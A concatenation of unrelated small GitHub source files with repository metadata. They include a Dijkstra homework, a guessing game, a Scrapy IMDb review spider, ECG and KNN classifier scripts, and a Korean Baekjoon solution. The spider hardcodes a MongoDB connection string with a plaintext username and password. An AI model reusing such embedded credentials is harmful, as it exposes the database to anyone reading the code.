PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;std_msgs;sensor_msgs;diagnostic_msgs;turtlebot3_msgs".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "turtlebot3_bringup"
PROJECT_SPACE_DIR = "/home/jacob/catkin_ws/devel"
PROJECT_VERSION = "1.2.1"
|
[
"reed.jacobp@gmail.com"
] |
reed.jacobp@gmail.com
|
297a8141da9cd0e52e6b2557323f122bd7cd3bfb
|
a9493cf8607b0f55bbde902d99dd844be5d23057
|
/network analytics/HW1_dijkstra.py
|
3d2533ad1e71d006fd5d56022ff5c65dff877939
|
[] |
no_license
|
chanbaik/chanbaik
|
16fc52e19c97b0de6dbf140734b754296110d42a
|
84d8848ee0df16c8dfef0fffe9791629d7b7049b
|
refs/heads/master
| 2021-01-10T13:32:20.944586
| 2020-02-17T16:23:48
| 2020-02-17T16:23:48
| 51,171,594
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,358
|
py
|
# -*- coding: utf-8 -*-
# %% define the dijkstra function
def dijkstra(graph_dict, start, end):
"""
This is a recursive function that implements Dijkstra's Shortest Path
algorithm.
It takes as its inputs:
i. a graph represented by a "dictionary of dictionaries" structure,
generated using networkx;
ii. a starting node in that graph; and
iii. an ending node for that graph
It then performs the following steps:
i. initialises a set of distances from the start node as infinity;
ii. initialises a set of 'predecessors' to None (a predecessor is
defined for each node in the network and it lists the prior node
in the path from start to end);
iii. initialises the set of of vertices for which the shortest path
from start to end has been found to empty; and then
iv. whilst there are still vertices left to assess:
a. restricts the set of vertices to those where that still need
analysisng;
b. finds the vertex that is the minimum distance from the start;
c. "relaxes" the neighbours of this closest vertex to see if the
shortest path to that vertex can be improved; and
d. updates the predecessor vertex for each node in the current path
When all vertices have been assessed, the function defines the path
and returns it with its associated cost
"""
distances = {} # empty dict for distances
predecessors = {} # list of vertices in path to current vertex
to_assess = graph_dict.keys() # get all the nodes in the graph that need to be assessed
# set all initial distances to infinity and no predecessor for any node
for node in graph_dict:
distances[node] = float('inf')
predecessors[node] = None
# set the intial collection of permanently labelled nodes to be empty
sp_set = []
# set the distance from the start node to be 0
distances[start] = 0
# as long as there are still nodes to assess:
while len(sp_set) < len(to_assess):
# chop out any nodes with a permament label
still_in = { node: distances[node] for node in [node for node in to_assess if node not in sp_set] }
# find the closest node to the current node
closest = min(still_in, key = distances.get)
# and add it to the set of permanently labelled nodes
sp_set.append(closest)
# then for all the neighbours of the closest node (that was just added)
# to the permanent set
for node in graph_dict[closest]:
# if a shorter path to that node can be found
if distances[node] > distances[closest] + graph[closest][node]['weight']:
# update the distance with that shorter distance; and
distances[node] = distances[closest] + graph[closest][node]['weight']
# set the predecessor for that node
predecessors[node] = closest
# once the loop is complete the final path needs to be calculated - this can
# be done by backtracing through the predecessors set
path = [end]
while start not in path:
path.append(predecessors[path[-1]])
# return the path in order start -> end, and it's cost
return path[::-1], distances[end]
# %%
# function to get _all_ dijkstra shortest paths
def dijkstra_all(graph_dict):
ans = []
for start in graph_dict.keys():
for end in graph_dict.keys():
ans.append(dijkstra(graph_dict, start, end))
return ans
#%% read in data - use a pandas dataframe just for convenience
import pandas as pd
data = pd.read_table("../data/HW1_4.txt",
sep = " ",
header = None,
names = ['vx', 'vy', 'weight'])
# %% use network x to prepare dictionary structure which can be fed in to the
# dijkstra function
import networkx as nx
graph = nx.from_pandas_dataframe(data, 'vx', 'vy', 'weight')
# graph_nodes = graph.nodes()
graph_dict = nx.to_dict_of_dicts(graph)
# %% run the functions
path = dijkstra(graph_dict, 1, 6)
all_paths = dijkstra_all(graph_dict)
|
[
"chanbaik91@gmail.com"
] |
chanbaik91@gmail.com
|
0521e2806ded691379691042dc91f708f1d9dd77
|
fc9653df96016aeee35e1175e23b7765d0f1967a
|
/PYTHON COURSE/30 - chapter-3_exercise-1(WINNING_GAME).py
|
12500a372a53f8c4f276f6edb099396520b270cb
|
[] |
no_license
|
tushsoni/PYTHON-BEGINNERS-TO-ADVANCED
|
d8ec2967f80000a1f464993367f7744a69bb72b4
|
3bd92d588145887d95e82aab03a6480cf46f50f1
|
refs/heads/master
| 2020-06-13T05:13:31.037671
| 2019-07-04T06:47:31
| 2019-07-04T06:47:31
| 194,547,503
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
# *************************************** CHAPTER-3_EXERCISE-1 *************************************#\
# QUESTION : MAKE A VARIABLE LIKE winning_number and assign any number to it , ask user to guess a number , if user guessed correctly then print "YOU WIN !!!!"
# if user did'nt guessed correctly then :
# 1) if user guessed lower than actual number then print "too low"
# 2) if user guessed higher than actual number then print "too high"
# bonus : : : google "how to generate random number using python" to generate random number
#winning number
# ****************************************************** ANSWER ******************************************************* #
winning_number = 13
guessed_number = int(input("Enter a number between 1 to 20 : "))
if winning_number == guessed_number:
print("You win the game")
else: # It is called as NESTED IF-ELSE (it contain if in else that's why)
if guessed_number < winning_number:
print("too low")
if guessed_number > winning_number:
print("too high")
|
[
"noreply@github.com"
] |
tushsoni.noreply@github.com
|
90bc1ede2a61174bac6107a0fd68500f728a5cdf
|
e334315ab49ea26617377d023563d2555c7f74eb
|
/SourceCode/inputLayer/suite_inputLayer/tst_case2/test.py
|
065f3dbe39890f46b8f728052cdce6f42b12e757
|
[] |
no_license
|
asthagaur1/danfoss-bdd-automation
|
d331072992949a3ce372803a284f408ce0315422
|
714d81e1545f05d16e7c26e832c8b9b9fe6448cf
|
refs/heads/main
| 2023-03-30T15:29:54.849082
| 2021-04-05T08:21:04
| 2021-04-05T08:21:04
| 353,651,291
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 257
|
py
|
# -*- coding: utf-8 -*-
import names
def main():
startApplication("KoolProg")
mouseClick(waitForObject(names.koolProg_imgSetParams_Image))
mouseClick(waitForObjectItem(":SetParameters_List_3", "Danfoss.T4CClient.SetParameters+ListFileItems"))
|
[
"asthagaur@danfoss.com"
] |
asthagaur@danfoss.com
|
3b43001e103907111a747181d9a47c7ede00f321
|
7c14313ddb570ee6c10b67132f66676845350a85
|
/단계별로 풀어보기/부르트 포스/1436_영화감독 숌.py
|
908be86f8df27acbb51428545664bbc12688afb5
|
[] |
no_license
|
jongtix/Python_Baekjoon
|
864eebe6e959417d92c3b1ba3549afc33aa37045
|
89df7a46a6c6b09b01888f905d864d5b59af95b8
|
refs/heads/master
| 2023-01-02T18:39:07.871990
| 2020-10-19T08:34:38
| 2020-10-19T08:34:38
| 265,094,216
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,837
|
py
|
# 문제
# 666은 종말을 나타내는 숫자라고 한다. 따라서, 많은 블록버스터 영화에서는 666이 들어간 제목을 많이 사용한다. 영화감독 숌은 세상의 종말 이라는 시리즈 영화의 감독이다. 조지 루카스는 스타워즈를 만들 때, 스타워즈 1, 스타워즈 2, 스타워즈 3, 스타워즈 4, 스타워즈 5, 스타워즈 6과 같이 이름을 지었고, 피터 잭슨은 반지의 제왕을 만들 때, 반지의 제왕 1, 반지의 제왕 2, 반지의 제왕 3과 같이 영화 제목을 지었다.
#
# 하지만 숌은 자신이 조지 루카스와 피터 잭슨을 뛰어넘는다는 것을 보여주기 위해서 영화 제목을 좀 다르게 만들기로 했다.
#
# 종말의 숫자란 어떤 수에 6이 적어도 3개이상 연속으로 들어가는 수를 말한다. 제일 작은 종말의 숫자는 666이고, 그 다음으로 큰 수는 1666, 2666, 3666, .... 과 같다.
#
# 따라서, 숌은 첫 번째 영화의 제목은 세상의 종말 666, 두 번째 영화의 제목은 세상의 종말 1666 이렇게 이름을 지을 것이다. 일반화해서 생각하면, N번째 영화의 제목은 세상의 종말 (N번째로 작은 종말의 숫자) 와 같다.
#
# 숌이 만든 N번째 영화의 제목에 들어간 숫자를 출력하는 프로그램을 작성하시오. 숌은 이 시리즈를 항상 차례대로 만들고, 다른 영화는 만들지 않는다.
#
# 입력
# 첫째 줄에 숫자 N이 주어진다. N은 10,000보다 작거나 같은 자연수이다.
#
# 출력
# 첫째 줄에 N번째 영화의 제목에 들어간 수를 출력한다.
#
# 예제 입력 1
# 2
# 예제 출력 1
# 1666
N = int(input())
result = list()
i = 1
stand = '666'
while len(result) < N:
if str(i).find(stand) > -1: result.append(i)
i += 1
print(result.pop())
|
[
"32856255+jongtix@users.noreply.github.com"
] |
32856255+jongtix@users.noreply.github.com
|
21562dbab964edf95aa8c7f35daa1e346636f62a
|
eb003b949ccd90d350eea8fc895f8b1ba9a99e40
|
/IMBD_SPIDER/IMBD_spider.py
|
1908cfd85a10a4e1b6f3c67f3f8dbe8749616aa6
|
[] |
no_license
|
AhmedFakhry47/ETL-Pipeline-For-IMDB_Movie_Reviews
|
59d952e3a7c5f8e815dcdd1152ad22dfd5ce4d59
|
5ca2327a8dc0f71f8a359860041d5b0e41bba421
|
refs/heads/master
| 2022-11-23T15:43:00.033629
| 2020-07-30T18:44:23
| 2020-07-30T18:44:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,881
|
py
|
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
from pymongo import MongoClient
import pymongo
import scrapy
def connect_database():
cluster = MongoClient("mongodb+srv://enihcam:12345@cluster0.irbss.mongodb.net/<Movie_Review>?retryWrites=true&w=majority")
db = cluster["Movie_Review"]
collection = db["IMBD_Reviews"]
return collection
SEARCH_QUERY=(
'https://www.imdb.com/search/title?'
'title_type=feature&'
'user_rating=1.0,10.0&'
'countries=us&'
'languages=en&'
'count=250&'
'view=simple'
)
class IMBD_spider(scrapy.spiders.Spider):
name = 'IMBD_spider'
allowed_domains = ['imdb.com']
start_urls = [SEARCH_QUERY]
rules = (Rule(
LinkExtractor(restrict_css=('div.desc a')),
follow=True,
callback='parse',
),)
database = connect_database()
def parse(self,response):
links = response.css('span.lister-item-header a::attr(href)').extract()
#print('here',links)
for link in links:
yield response.follow(link,callback=self.parse_movie)
def parse_movie(self,response):
data = {}
data['title'] = response.css('h1::text').extract_first().strip()
#data['rating'] = response.css('.subtext::text').extract_first().strip() or None
data['year'] = response.css('#titleYear a::text').extract_first()
data['users_rating'] = response.xpath('//span[contains(@itemprop, "ratingValue")]/text()').extract_first()
data['votes'] = response.xpath('//span[contains(@itemprop, "ratingCount")]/text()').extract_first()
data['datascore'] = response.xpath('//div[contains(@class, "datacriticScore")]/span/text()').extract_first()
data['img_url'] = response.xpath('//div[contains(@class, "poster")]/a/img/@src').extract_first()
countries = response.xpath('//div[contains(@class, "txt-block") and contains(.//h4, "Country")]/a/text()').extract()
data['countries'] = [country.strip() for country in countries]
languages = response.xpath('//div[contains(@class, "txt-block") and contains(.//h4, "Language")]/a/text()').extract()
data['languages'] = [language.strip() for language in languages]
actors = response.xpath('//td[not(@class)]/a/text()').extract()
data['actors'] = [actor.strip() for actor in actors]
genres = response.xpath("//div[contains(.//h4, 'Genres')]/a/text()").extract()
data['genre'] = [genre.strip() for genre in genres]
tagline = response.xpath('//div[contains(string(), "Tagline")]/text()').extract()
data['tagline'] = ''.join(tagline).strip() or None
data['description'] = response.xpath('//div[contains(@class, "summary_text")]/text()').extract_first().strip() or None
directors = response.xpath("//div[contains(@class, 'credit_summary_item') and contains(.//h4, 'Director')]/a/text()").extract() or None
if directors: data['directors'] = [director.strip() for director in directors]
data['runtime'] = response.xpath("//div[contains(@class, 'txt-block') and contains(.//h4, 'Runtime')]/time/text()").extract_first() or None
data['imdb_url'] = response.url.replace('?ref_=adv_li_tt', '')
reviews_link = response.xpath("//div[contains(@class,'subnav')]/div[@id='quicklinksMainSection']/a[@class='quicklink'][3]/@href").extract()
yield response.follow(reviews_link[0],meta={'movie_info':data},callback=self.parse_reviews)
def parse_reviews(self,response):
data = response.meta['movie_info']
reviews = response.xpath("//div[@class='text show-more__control']/text()").extract()
stars = response.xpath("//span[@class='rating-other-user-rating']/span/text()").extract()[::2]
#Storing data in database
current_movie = {x:data[x] for x in data.keys()}
current_movie['_id']= current_movie['title']
current_movie['Reviews'] = {str(j):[i,v] for j,i,v in zip(list(range(0,len(stars))),reviews,stars)}
del(current_movie['title'])
self.database.insert_one(current_movie)
yield None
|
[
"ahmedfakhry805@gmail.com"
] |
ahmedfakhry805@gmail.com
|
72ee003a9e5c5ffb3c760e5114f3bf624734ed45
|
2c1143026cb6ed4e2d9093368eb3163768be0bd0
|
/examples/UnderDev/ECG_Entropy/test.py
|
30d046ad59f14996bf62c4ad1d332715fa6f0963
|
[
"Python-2.0",
"MIT"
] |
permissive
|
rhenanbartels/NeuroKit.py
|
4679f39e874f852509d11287e0e3936dd8baf702
|
1c95fd3f67f4157d6f1e13b10b9d08662ffecf05
|
refs/heads/master
| 2021-01-20T18:10:22.134512
| 2017-05-10T20:55:31
| 2017-05-10T20:55:31
| 90,910,551
| 0
| 0
| null | 2017-05-10T21:37:44
| 2017-05-10T21:37:43
| null |
UTF-8
|
Python
| false
| false
| 543
|
py
|
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import neurokit as nk
import nolds
df = pd.read_csv('data.csv')
df = nk.ecg_process(ecg=df["ECG"])
rri = df["ECG"]["RR_Intervals"]
signal=rri
tolerance = "default"
emb_dim=2
chaos = nk.complexity(signal, lyap_r=False, lyap_e=False)
#chaos = pd.Series(chaos)
#chaos.index = ["ECG_Complexity_" + s for s in chaos.index]
#processed_ecg["ECG"]["Complexity"] = chaos.to_dict()
#nolds.sampen(rri, 2, 0.1*np.std(rri), dist="euler")
#sample_entropy(rri,2, 0.1*np.std(rri))[1]
#
#
|
[
"dom.mak19@gmail.com"
] |
dom.mak19@gmail.com
|
19b9ec027d7d7e6b2f95e1ea3516fb29e6acdfbb
|
7f4b7bd69bf406703bd669acee58e789e937dec0
|
/classifier_models/q-1-1.py
|
f26f48734307675bf7f28921774a9deaeffbd45a
|
[] |
no_license
|
PrabhaPandey911/Machine-Learning
|
9c3767269fcb9c64f5cde8f4e629cf10f4caa7e2
|
fd7555fb90fb4f5e9b815a6d046ba0240f530841
|
refs/heads/main
| 2023-05-08T11:29:02.486864
| 2021-05-23T15:58:37
| 2021-05-23T15:58:37
| 370,025,489
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,443
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # q-1-1
#
# # Part (i):
# In[137]:
import numpy as np
import pandas as pd
import sys
import math
import matplotlib
import matplotlib.pyplot as plt
from pylab import *
filename1="./RobotDataset/Robot1"
filename2="./RobotDataset/Robot2"
# In[138]:
#As the given data does not have column names defined, hence giving them names accordingly, while reading the file
colnames=['class', 'a1', 'a2', 'a3','a4','a5','a6','Id']
robot1 = pd.read_csv(filename, sep=' ', names=colnames,skipinitialspace=True)
robot2 =pd.read_csv(filename2,sep=' ',names=colnames,skipinitialspace=True)
# In[139]:
#To calculate the distance we need to bring down all the values of all the columns within the range of 0 and 1
#and hence normalize the data
#bringing down the values in the range(0,1)
def normalise(data):
result=data
for col in data.columns:
if col!='class'and col!='Id':
minimum=data[col].min()
maximum=data[col].max()
result[col]=((data[col])-minimum)/(maximum-minimum)
return result
#normalizing for robot1
robot1=normalise(robot1)
#normalizing for robot2
robot2=normalise(robot2)
# In[140]:
#for random spliting of data into training and validate
#for robot1
robot1 = robot1.sample(frac=1)
train1, validate1 = np.split(robot1, [int(.8*len(robot1))])
#for robot2
robot2=robot2.sample(frac=1)
train2,validate2 = np.split(robot2, [int(.8*len(robot2))])
# In[141]:
#for predicting in KNN, what we do is, for any given row, we try and calculate the distance with every row of the
#training data and then select k
def predict(row,k,t,dis_func):
#t: train data set
#dis_func: distance function used
#k: k value provided
#row: point under consideration
#get the sorted list according to the function passed
#structure of list, tuple of distance and corresponding class lable
distance=dis_func(t,row)
#knn is a list of size 2, zeroth index represents '0' of class lable, first index represents '1' of class lable
knn=[0,0]
#take the first k distances and calculate the total number of times '0' and '1' appearing in class lable
for i in range(0,k):
knn[distance[i][1]]+=1
#return the class label which occured most number of times
if knn[1]>=knn[0]:
return 1
else:
return 0
# In[142]:
#calculate distance using euclidean formula
def euclidean(t,row):
distance=[]
columns=['a1','a2','a3','a4','a5','a6']
#t is the training data, to find the distance with all points, a row equals a point
#row is the given point with which distance is to be calculated
for index1,row1 in t.iterrows():
temp=0
#for one row, iterate over all the columns and sum up the square of difference (formula for euclidean)
for col in columns:
temp+=((row1[col]-row[col])**2)
#take square root of the above aggregate, this is the euclidean distance between current considered points
#save the distance and corresponding class of the training row under consideration, in a list "distance"
distance.append((math.sqrt(temp),row1['class']))
#sorting all the distances in increasing order
distance.sort()
#return the distance list
return distance
# In[143]:
#calculate distance using manhattan formula
def manhattan(t,row):
columns=['a1','a2','a3','a4','a5','a6']
distance=[]
#t is the training data, to find the distance with all points, a row equals a point
#row is the given point with which distance is to be calculated
for index1,row1 in t.iterrows():
temp=0
#for one row traverse over all the columns and sum up the absolute of corresponding differences
for col in columns:
temp+=abs(row1[col]-row[col])
#store the distance and corresponding class lable value
distance.append((temp,row1['class']))
#sort the distances in increasing order
distance.sort()
#return the distance list
return distance
# In[144]:
#calculate distance using manhattan formula
def chebyshev(t,row):
columns=['a1','a2','a3','a4','a5','a6']
distance=[]
#t is the training data, to find the distance with all points, a row equals a point
#row is the given point with which distance is to be calculated
for index1,row1 in t.iterrows():
max_value=-sys.maxint-1
#for a row traverse all the columns and find out the max value of absolute of corresponding differences
for col in columns:
diff=abs(row1[col]-row[col])
max_value=max(diff,max_value)
#store the distance and corresponding class lable value
distance.append((max_value,row1['class']))
#sort the distances in increasing order
distance.sort()
#return the distance list
return distance
# In[145]:
#calculate accurancy for training data t and a given function func
def calculate_accuracy(t,func,validate):
l=len(t)
l=int(math.sqrt(l))
l+=1
#for plotting graph
k_level=[]
accu_list=[]
max_acc=-sys.maxint-1
max_prec=0
max_recall=0
max_f1sc=0
final_k=0
#range of k is from 1 to square root of the number of rows of training data set provided
for i in range(1,l,2): #as k value should always be odd, therefore step size is equal to 2 (third arg)
#for confusion matrix
actual_value=[]
predicted_value=[]
tp=0
tn=0
fp=0
fn=0
#for each row in validate
for index,row in validate.iterrows():
x=predict(row,i,t,func)
if row['class']==1 and x==1:
tp+=1
if row['class']==0 and x==0:
tn+=1
if row['class']==1 and x==0:
fn+=1
if row['class']==0 and x==1:
fp+=1
#for confusion matrix
actual_value.append(row['class'])
predicted_value.append(x)
#for confusion matrix
actu = pd.Series(actual_value, name='Actual')
pred = pd.Series(predicted_value, name='Predicted')
df_confusion = pd.crosstab(actu, pred)
if tp+tn+fp+fn!=0:
acc_cm=float(tp+tn)/(tp+tn+fp+fn)#accuracy_cm(df_confusion)
else:
acc_cm=0
if tp+fn!=0:
recal_cm=float(tp)/(tp+fn)#recall_cm(df_confusion)
else:
recal_cm=0
if tp+fp!=0:
preci_cm=float(tp)/(tp+fp)#precision_cm(df_confusion)
else:
preci_cm=0
if recal_cm!=0 and preci_cm!=0:
f1_sc=(2/((1/recal_cm)+(1/preci_cm)))#f1Score_cm(preci_cm,recal_cm)
else:
f1_sc=0
#to plot the graph between different k values and its corresponding accuracy
k_level.append(i)
accu_list.append(acc_cm)
if max_acc<acc_cm:
max_acc=acc_cm
final_k=i
max_prec=preci_cm
max_recall=preci_cm
max_f1sc=preci_cm
return (k_level,accu_list,final_k,max_acc,max_prec,max_recall,max_f1sc)
# In[146]:
k1_list,accu1,k1,acc1,pre1,recal1,f1sc1=calculate_accuracy(train1,euclidean,validate1)
k2_list,accu2,k2,acc2,pre2,recal2,f1sc2=calculate_accuracy(train1,chebyshev,validate1)
k3_list,accu3,k3,acc3,pre3,recal3,f1sc3=calculate_accuracy(train1,manhattan,validate1)
k11_list,accu11,k11,acc11,pre11,recal11,f1sc11=calculate_accuracy(train2,euclidean,validate2)
k22_list,accu22,k22,acc22,pre22,recal22,f1sc22=calculate_accuracy(train2,chebyshev,validate2)
k33_list,accu33,k33,acc33,pre33,recal33,f1sc33=calculate_accuracy(train2,manhattan,validate2)
# # Part (ii): Iris
#
# In[147]:
irisfile="./Iris/Iris.csv"
colnames=['sepal_length', 'sepal_width', 'petal_length', 'petal_width','class']
data = pd.read_csv(irisfile, names=colnames,skipinitialspace=True)
#bringing down the values in the range(0,1)
def normalise_iris(data):
result=data
for col in data.columns:
if col!='class':
minimum=data[col].min()
maximum=data[col].max()
result[col]=((data[col])-minimum)/(maximum-minimum)
return result
data=normalise_iris(data)
# In[148]:
data = data.sample(frac=1)
train, validate = np.split(data, [int(.8*len(data))])
# In[149]:
def predict_iris(row,k,t,dis_func):
distance=dis_func(t,row)
knn={}
for i in range(0,k):
if distance[i][1] not in knn.keys():
knn[distance[i][1]]=1
else:
knn[distance[i][1]]+=1
maxi=0
label=''
for i in knn.keys():
if maxi<knn[i]:
maxi=knn[i]
label=i
return label
# In[150]:
def euclidean_iris(t,row):
distance=[]
columns=['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
for index1,row1 in t.iterrows():
temp=0
for col in columns:
temp+=((row1[col]-row[col])**2)
distance.append((math.sqrt(temp),row1['class']))#distance is list of distance and corresponding class label
distance.sort()#sorting all the distances in increasing order
return distance
# In[151]:
def manhattan_iris(t,row):
columns=['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
distance=[]
for index1,row1 in t.iterrows():
temp=0
for col in columns:
temp+=abs(row1[col]-row[col])
distance.append((temp,row1['class']))
distance.sort()
return distance
# In[152]:
def chebyshev_iris(t,row):
columns=['sepal_length', 'sepal_width', 'petal_length', 'petal_width']
distance=[]
for index1,row1 in t.iterrows():
max_value=-sys.maxint-1
for col in columns:
if max_value<abs(row1[col]-row[col]):
max_value=abs(row1[col]-row[col])
distance.append((max_value,row1['class']))
distance.sort()
return distance
# In[153]:
def accuracy_cm(df_confusion):
tpptn=0 #tp +tn
for i in df_confusion:
tpptn+=df_confusion[i][i]
total=0
for i in df_confusion:
total+=df_confusion[i].sum()
return float(tpptn)/total
# In[154]:
def precision_cm(df_confusion):
return np.sum(np.diag(df_confusion)/ np.sum(df_confusion, axis = 0))/len(np.diag(df_confusion)/ np.sum(df_confusion, axis = 0))
# In[155]:
def recall_cm(df_confusion):
return np.sum(np.diag(df_confusion) / np.sum(df_confusion, axis = 1))/len(np.diag(df_confusion) / np.sum(df_confusion, axis = 1))
# In[156]:
def f1Score_cm(precision,recall):
return float(2)/((1/recall)+(1/precision))
# In[157]:
#calculate accurancy for training data t and a given function func
def calculate_accuracy_iris(t,func,validate):
l=len(t)
l=int(math.sqrt(l))
l+=1
#for plotting graph
k_level=[]
accu_list=[]
max_acc=-sys.maxint-1
final_k=0
max_prec=0
max_recall=0
max_f1sc=0
#range of k is from 1 to square root of the number of rows of training data set provided
for i in range(1,l): #here one skip is performed each time as class lable has 3 unique values
#for confusion matrix
actual_value=[]
predicted_value=[]
#for each row in validate
for index,row in validate.iterrows():
x=predict_iris(row,i,t,func)
#for confusion matrix
actual_value.append(row['class'])
predicted_value.append(x)
actu = pd.Series(actual_value, name='Actual')
pred = pd.Series(predicted_value, name='Predicted')
df_confusion = pd.crosstab(actu, pred)
acc_cm=accuracy_cm(df_confusion)
preci_cm=precision_cm(df_confusion)
recal_cm=recall_cm(df_confusion)
f1_sc=f1Score_cm(preci_cm,recal_cm)
#to plot the graph between different k values and its corresponding accuracy
k_level.append(i)
accu_list.append(acc_cm)
if max_acc<acc_cm:
max_acc=acc_cm
final_k=i
max_prec=preci_cm
max_recall=preci_cm
max_f1sc=preci_cm
return (k_level,accu_list,final_k,max_acc,max_prec,max_recall,max_f1sc)
# # q-1-1-1
# # Accuracy, Precision, Recall, k-value and F1 score
# In[158]:
print "*******ROBOT1*******"
print
print "Eucledian"
print
print "k_value: ",k1
print "max accuracy: ",acc1
print "precision: ",pre1
print "recall: ",recal1
print "f1 score: ",f1sc1
print
print "chebyshev"
print
print "k_value: ",k2
print "max accuracy: ",acc2
print "precision: ",pre2
print "recall: ",recal2
print "f1 score: ",f1sc2
print
print "manhattan"
print
print "k_value: ",k3
print "max accuracy: ",acc3
print "precision: ",pre3
print "recall: ",recal3
print "f1 score: ",f1sc3
print
# In[159]:
print "*******ROBOT2*******"
print
print "Eucledian"
print
print "k_value: ",k11
print "max accuracy: ",acc11
print "precision: ",pre11
print "recall: ",recal11
print "f1 score: ",f1sc11
print
print "chebyshev"
print
print "k_value: ",k22
print "max accuracy: ",acc22
print "precision: ",pre22
print "recall: ",recal22
print "f1 score: ",f1sc1
print
print "manhattan"
print
print "k_value: ",k33
print "max accuracy: ",acc33
print "precision: ",pre33
print "recall: ",recal33
print "f1 score: ",f1sc33
print
# In[160]:
#IRIS
k1_listi,accu1i,k1i,acc1i,prec1i,recal1i,f1sc1i=calculate_accuracy_iris(train,euclidean_iris,validate)
k2_listi,accu2i,k2i,acc2i,prec2i,recal2i,f1sc2i=calculate_accuracy_iris(train,chebyshev_iris,validate)
k3_listi,accu3i,k3i,acc3i,prec3i,recal3i,f1sc3i=calculate_accuracy_iris(train,manhattan_iris,validate)
# In[161]:
print "*******IRIS*******"
print
print "Eucledian"
print
print "k: ",k1i
print "max accuracy: ",acc1i
print "precision: ",prec1i
print "recall: ",recal1i
print "f1 Score: ",f1sc1i
print
print "chebyshev"
print
print "k: ",k2i
print "max accuracy: ",acc2i
print "precision: ",prec2i
print "recall: ",recal2i
print "f1 Score: ",f1sc2i
print
print "manhattan"
print
print "k: ",k3i
print "max accuracy: ",acc3i
print "precision: ",prec3i
print "recall: ",recal3i
print "f1 Score: ",f1sc3i
print
# # q-1-1-2
# # Graphs for Euclidean, Chebyshev and Manhattan
# In[162]:
fig,axes=plt.subplots(figsize=(7,7))
axes.plot(k1_list,accu1,label=r"$Eucledian$")
axes.plot(k2_list,accu2,label=r"$Chebyshev$")
axes.plot(k3_list,accu3,label=r"$Manhattan$")
legend=axes.legend(loc='best')
axes.set_title('Robot 1')
plt.xlabel('k values')
plt.ylabel('accuracy')
# In[163]:
fig,axes=plt.subplots(figsize=(7,7))
axes.plot(k11_list,accu11,label=r"$Eucledian$")
axes.plot(k22_list,accu22,label=r"$Chebyshev$")
axes.plot(k33_list,accu33,label=r"$Manhattan$")
legend=axes.legend(loc='best')
axes.set_title('Robot 2')
plt.xlabel('k values')
plt.ylabel('accuracy')
# In[164]:
fig,axes=plt.subplots(figsize=(7,7))
axes.plot(k1_listi,accu1i,label=r"$Eucledian$")
axes.plot(k2_listi,accu2i,label=r"$Chebyshev$")
axes.plot(k3_listi,accu3i,label=r"$Manhattan$")
legend=axes.legend(loc='best')
axes.set_title('Iris')
plt.xlabel('k values')
plt.ylabel('accuracy')
# # Test file
# # For robot1
# In[165]:
testfile=raw_input("Test File: ")
colnames=[ 'a1', 'a2', 'a3','a4','a5','a6','Id']
test = pd.read_csv(testfile, sep=' ', names=colnames,skipinitialspace=True)
test=normalise(test)
for index,row in test.iterrows():
print predict(row,3,train1,euclidean)
# # For iris
# In[166]:
testiris=raw_input("Test File: ")
colnames_iris=['sepal_length', 'sepal_width', 'petal_length', 'petal_width','class']
testi = pd.read_csv(testiris, sep=',', names=colnames_iris,skipinitialspace=True)
testi=normalise_iris(testi)
for index,row in testi.iterrows():
print predict_iris(row,7,train,euclidean_iris)
# # Comparision With Scikit-learn
# In[167]:
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report, confusion_matrix
import matplotlib.pyplot as plt
# In[168]:
from sklearn import preprocessing
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier
from sklearn.metrics import classification_report, confusion_matrix
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KNeighborsClassifier
from sklearn.metrics import accuracy_score
# In[169]:
def compareScikit(df,target,identifier=None):
le = preprocessing.LabelEncoder()
# df[identifier] = le.fit_transform(df[identifier])
if identifier is not None:
df[identifier] = le.fit_transform(df[identifier])
# dataset_R1=dataset_R1.drop('index',1)
cols = [col for col in df.columns if col not in [target,identifier]]
data=df[cols]
target=df[target]
data_train, data_test, target_train, target_test = train_test_split(data,target, test_size = 0.20, random_state = 10)
scaler = StandardScaler()
scaler.fit(data_train)
data_train = scaler.transform(data_train)
data_test = scaler.transform(data_test)
classifier = KNeighborsClassifier(n_neighbors=5)
classifier.fit(data_train, target_train)
y_pred = classifier.predict(data_test)
error = []
l=len(df)
l=int(math.sqrt(l))
l+=1
for i in range(1, l):
knn = KNeighborsClassifier(n_neighbors=i)
knn.fit(data_train, target_train)
pred_i = knn.predict(data_test)
error.append(np.mean(pred_i != target_test))
plt.figure(figsize=(7, 7))
plt.plot(range(1, l), error, color='red', linestyle='dashed', marker='o',
markerfacecolor='blue', markersize=10)
plt.title('Error Rate K Value')
plt.xlabel('K Value')
plt.ylabel('Mean Error')
score = accuracy_score(target_test, y_pred)
print("score",score)
# # Robot 1
# In[170]:
compareScikit(robot1,'class','Id')
# # Robot 2
# In[171]:
compareScikit(robot2,'class','Id')
# # Iris
# In[172]:
compareScikit(data,'class',None)
# # Possible reasons for better performance
# 1) There is no training phase or it is very minimal, hence no extra time is utilized to do the same.
#
#
# 2) There is no data distribution.
|
[
"prabha.pandey.iiith@gmail.com"
] |
prabha.pandey.iiith@gmail.com
|
02213e4a2e6da7ecce759935c4b8ca0ee895f692
|
1a2b7aa4db8f36fcabb7093d4a5120a8ce3fa57e
|
/nanalib/nanalib/nanalib/doctype/author/test_author.py
|
42da2bd908bf25cc1ffd9bca4be4c90df0ff0b8a
|
[
"MIT"
] |
permissive
|
mohamedhafezqo/nana_library
|
